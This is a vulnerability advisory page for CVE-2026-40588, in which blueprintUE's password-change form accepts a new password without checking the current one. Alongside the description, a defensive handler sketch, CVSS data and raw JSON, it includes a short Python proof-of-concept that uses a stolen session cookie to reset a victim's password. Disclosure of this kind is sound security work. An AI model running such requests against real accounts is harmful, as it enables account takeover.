Security Vulnerability Report
CVE-2026-40588 CVSS 8.1 HIGH

CVE-2026-40588

Published: 2026-04-21 18:16:51
Last Modified: 2026-04-22 21:16:28

Description

blueprintUE is a tool to help Unreal Engine developers. Prior to 4.2.0, the password change form at /profile/{slug}/edit/ does not include a current_password field and does not verify the user's existing password before accepting a new one. Any attacker who obtains a valid authenticated session — through XSS exploitation, session sidejacking over HTTP, physical access to a logged-in browser, or a stolen "remember me" cookie — can immediately change the account password without knowing the original credential, resulting in permanent account takeover. This vulnerability is fixed in 4.2.0.
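The server-side check whose absence the description identifies, as an added Python sketch (not blueprintUE's own code). The `Account` class, the in-memory session set and the PBKDF2 parameters are assumptions for illustration; the form field names follow this page.

```python
import hashlib
import hmac
import os

def hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2 parameters are illustrative assumptions, not the project's settings.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

class Account:
    """Hypothetical account record: salted hash plus the set of live session ids."""
    def __init__(self, password: str):
        self.salt = os.urandom(16)
        self.pw_hash = hash_password(password, self.salt)
        self.sessions = set()

def change_password(account: Account, session_id: str, form: dict):
    """Hardened handler: a valid session alone is not enough to set a new password."""
    if session_id not in account.sessions:
        return False, "not authenticated"

    # Re-authenticate: the caller must prove knowledge of the existing credential.
    supplied = hash_password(form.get("current_password", ""), account.salt)
    if not hmac.compare_digest(supplied, account.pw_hash):
        return False, "current password incorrect"

    new = form.get("new_password", "")
    if not new or new != form.get("confirm_password"):
        return False, "new password mismatch"

    account.salt = os.urandom(16)
    account.pw_hash = hash_password(new, account.salt)
    # Revoke every other session so a previously stolen cookie stops working.
    account.sessions = {session_id}
    return True, "changed"
```

A request that carries only `new_password` and `confirm_password` is rejected, and a successful change drops all sessions except the one that made it.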

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

blueprintUE < 4.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-40588
# Exploit: Change password without knowing the current one using a valid session.
import requests

target_url = "http://target.com/profile/{user_slug}/edit/"
stolen_session_cookie = "victim_session_id_here"

headers = {
    "Cookie": f"sessionid={stolen_session_cookie}"
}

data = {
    "new_password": "NewHackedPassword123!",
    "confirm_password": "NewHackedPassword123!"
    # Note: 'current_password' field is missing or ignored
}

response = requests.post(target_url, headers=headers, data=data)

if response.status_code == 200:
    print("[+] Password changed successfully!")
else:
    print("[-] Failed to change password.")

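References

https://github.com/blueprintue/blueprintue-self-hosted-edition/security/advisories/GHSA-73f2-p9jr-m44x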

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40588", "sourceIdentifier": "[email protected]", "published": "2026-04-21T18:16:51.207", "lastModified": "2026-04-22T21:16:27.863", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "blueprintUE is a tool to help Unreal Engine developers. Prior to 4.2.0, the password change form at /profile/{slug}/edit/ does not include a current_password field and does not verify the user's existing password before accepting a new one. Any attacker who obtains a valid authenticated session — through XSS exploitation, session sidejacking over HTTP, physical access to a logged-in browser, or a stolen \"remember me\" cookie — can immediately change the account password without knowing the original credential, resulting in permanent account takeover. This vulnerability is fixed in 4.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-620"}]}], "references": [{"url": "https://github.com/blueprintue/blueprintue-self-hosted-edition/security/advisories/GHSA-73f2-p9jr-m44x", "source": "[email protected]"}, {"url": "https://github.com/blueprintue/blueprintue-self-hosted-edition/security/advisories/GHSA-73f2-p9jr-m44x", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}